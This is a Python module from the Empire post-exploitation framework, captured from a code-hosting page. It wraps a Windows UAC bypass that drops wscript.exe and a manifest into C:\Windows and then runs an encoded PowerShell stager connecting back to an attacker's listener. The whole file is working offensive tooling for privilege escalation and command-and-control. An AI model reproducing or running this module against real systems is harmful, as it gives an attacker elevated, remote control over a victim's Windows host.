111 lines
4.0 KiB
Python
111 lines
4.0 KiB
Python
from lib.common import helpers
|
|
|
|
class Module:
|
|
|
|
def __init__(self, mainMenu, params=[]):
|
|
|
|
self.info = {
|
|
'Name': 'Invoke-WScriptBypassUAC',
|
|
|
|
'Author': ['@enigma0x3', '@harmyj0y', 'Vozzie'],
|
|
|
|
'Description': ("Drops wscript.exe and a custom manifest into C:\Windows "
|
|
"and then proceeds to execute VBScript using the wscript executable"
|
|
"with the new manifest. The VBScript executed by C:\Windows\wscript.exe will run elevated."),
|
|
|
|
'Background' : True,
|
|
|
|
'OutputExtension' : None,
|
|
|
|
'NeedsAdmin' : False,
|
|
|
|
'OpsecSafe' : False,
|
|
|
|
'MinPSVersion' : '2',
|
|
|
|
'Comments': [
|
|
'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html',
|
|
'https://github.com/Vozzie/uacscript',
|
|
]
|
|
}
|
|
|
|
# any options needed by the module, settable during runtime
|
|
self.options = {
|
|
# format:
|
|
# value_name : {description, required, default_value}
|
|
'Agent' : {
|
|
'Description' : 'Agent to run module on.',
|
|
'Required' : True,
|
|
'Value' : ''
|
|
},
|
|
'Listener' : {
|
|
'Description' : 'Listener to use.',
|
|
'Required' : True,
|
|
'Value' : ''
|
|
},
|
|
'UserAgent' : {
|
|
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
|
|
'Required' : False,
|
|
'Value' : 'default'
|
|
},
|
|
'Proxy' : {
|
|
'Description' : 'Proxy to use for request (default, none, or other).',
|
|
'Required' : False,
|
|
'Value' : 'default'
|
|
},
|
|
'ProxyCreds' : {
|
|
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
|
|
'Required' : False,
|
|
'Value' : 'default'
|
|
}
|
|
}
|
|
|
|
# save off a copy of the mainMenu object to access external functionality
|
|
# like listeners/agent handlers/etc.
|
|
self.mainMenu = mainMenu
|
|
|
|
for param in params:
|
|
# parameter format is [Name, Value]
|
|
option, value = param
|
|
if option in self.options:
|
|
self.options[option]['Value'] = value
|
|
|
|
|
|
def generate(self):
|
|
|
|
listenerName = self.options['Listener']['Value']
|
|
|
|
# staging options
|
|
userAgent = self.options['UserAgent']['Value']
|
|
proxy = self.options['Proxy']['Value']
|
|
proxyCreds = self.options['ProxyCreds']['Value']
|
|
|
|
# read in the common module source code
|
|
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1"
|
|
|
|
try:
|
|
f = open(moduleSource, 'r')
|
|
except:
|
|
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
|
|
return ""
|
|
|
|
moduleCode = f.read()
|
|
f.close()
|
|
|
|
script = moduleCode
|
|
|
|
if not self.mainMenu.listeners.is_listener_valid(listenerName):
|
|
# not a valid listener, return nothing for the script
|
|
print helpers.color("[!] Invalid listener: " + listenerName)
|
|
return ""
|
|
else:
|
|
# generate the PowerShell one-liner with all of the proper options set
|
|
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
|
|
|
|
if launcher == "":
|
|
print helpers.color("[!] Error in launcher generation.")
|
|
return ""
|
|
else:
|
|
script += "Invoke-WScriptBypassUAC -payload \"%s\"" % (launcher)
|
|
return script
|